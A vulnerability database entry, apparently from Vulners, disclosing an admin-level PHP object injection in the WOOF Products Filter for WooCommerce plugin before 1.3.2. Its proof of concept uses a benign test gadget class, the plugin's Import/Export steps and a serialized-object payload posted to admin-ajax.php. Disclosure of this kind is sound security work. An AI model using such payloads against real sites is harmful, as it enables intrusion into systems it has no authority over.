Lucene search

K

WOOF - Products Filter for WooCommerce < 1.3.2 - Admin+ PHP Object Injection

🗓️ 11 Jan 2023 00:00:00Reported by thinhnguyen1337Type 
wpexploit
 wpexploit
👁 111 Views

Vulnerability in WOOF - Products Filter for WooCommerce < 1.3.2 allows PHP Object Injectio

Show more
Related
Code
1. To simulate a gadget chain, put the following code in a plugin:

class Evil {
  public function __wakeup() : void {
    die("Arbitrary deserialization");
  }
}

2. First, enable Import/Export extension: WooCommerce > Settings > Products Filter > Extensions > Tick the box Import/Export > Save changes (requires the "WooCommerce" plugin to be active)

3. Use "Export/Import" function in WooCommerce > Settings > Products Filter > Advanced > Export/Import, and enter with the following content: {"evil":"O:4:\"Evil\":0:{}"}

4. When clicking "Import placed data", click "OK", We will get an "Arbitrary deserialization" message.

POST /wp-admin/admin-ajax.php HTTP/1.1

action=woof_do_import_data&import_value=%7B%22evil%22%3A%22O%3A4%3A%5C%22Evil%5C%22%3A0%3A%7B%7D%22%7D

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
11 Jan 2023 00:00Current
0.6Low risk
Vulners AI Score0.6
EPSS0.001
111
.json
Report